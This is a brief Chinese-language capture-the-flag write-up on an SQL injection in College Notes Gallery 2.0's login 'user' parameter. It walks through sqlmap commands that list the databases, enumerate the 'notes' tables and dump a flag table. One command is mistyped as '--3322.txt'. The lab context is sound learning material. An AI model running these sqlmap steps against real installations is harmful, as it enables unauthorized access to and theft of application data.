简介
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.
正文
1.进入靶场2.访问登录界面
发现为报错注入,直接抓包sqlmap跑就行了(其实是不会手注)
3.sqlmap -r 3322.txt --batch --dbs4.sqlmap --3322.txt --batch -D notes --tables发现flllaaaag
5. sqlmap -r 3322.txt --batch -D notes -T flllaaaag --dump 得到flag